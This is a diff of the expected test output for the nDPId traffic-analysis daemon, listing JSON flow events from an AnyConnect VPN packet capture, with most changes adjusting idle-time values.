+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687269223,"flow_last_seen":1569687272080,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} 00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1569687277139,"flow_last_seen":1569687283186,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":912,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
@@ -335,8 +335,8 @@ 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2441,"flow_first_seen":1569687268746,"flow_last_seen":1569687289262,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1469,"flow_tot_l4_payload_len":789975,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} 
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1569687241656,"flow_last_seen":1569687287122,"flow_idle_time":120000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1920,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
@@ -347,45 +347,45 @@ 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687241422,"flow_last_seen":1569687286460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":2200,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687241422,"flow_last_seen":1569687286460,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":2200,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} 
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -01168{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
+01168{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 